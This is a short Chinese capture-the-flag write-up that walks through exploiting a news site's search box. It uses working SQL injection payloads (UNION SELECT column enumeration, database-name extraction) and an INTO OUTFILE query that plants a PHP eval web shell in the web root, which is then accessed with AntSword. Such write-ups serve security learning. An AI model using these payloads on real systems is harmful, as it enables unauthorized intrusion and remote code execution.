尝试在URL中测试一下sql注入,但是禁止注入
那么在输入框中测试一下xss,存在xss,那么极有可能如果存在sql注入在这里
在测试时,出现了这个搜索框的源代码,可以看出是单引号包含,所以可以测试闭合方式为单引号的sql注入
经测试,确实训在sql注入,闭合方式就是单引号
那么接下来测试回显点,得到2,3两个回显点
-1' union select 1,2,3#
爆数据库名,得到数据库名sqlgunnews
-1' union select 1,database(),3#
既然存在sql注入,那么我们可以尝试一下写入一句话木马进行测试
但是缺少绝对路径
我们对IP进行目录扫描一下看一下有什么可以用的
发现有一个phpinfo.php文件,访问一下
得到网站根目录/var/www/html
那接下来构造payload,将一句话木马写入根目录
-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/zxin.php' #
访问zxin.php文件,我们的一句话木马就在进去了
使用蚁剑谅连接一下,成功连接
在根目录中可以找得到falg文件
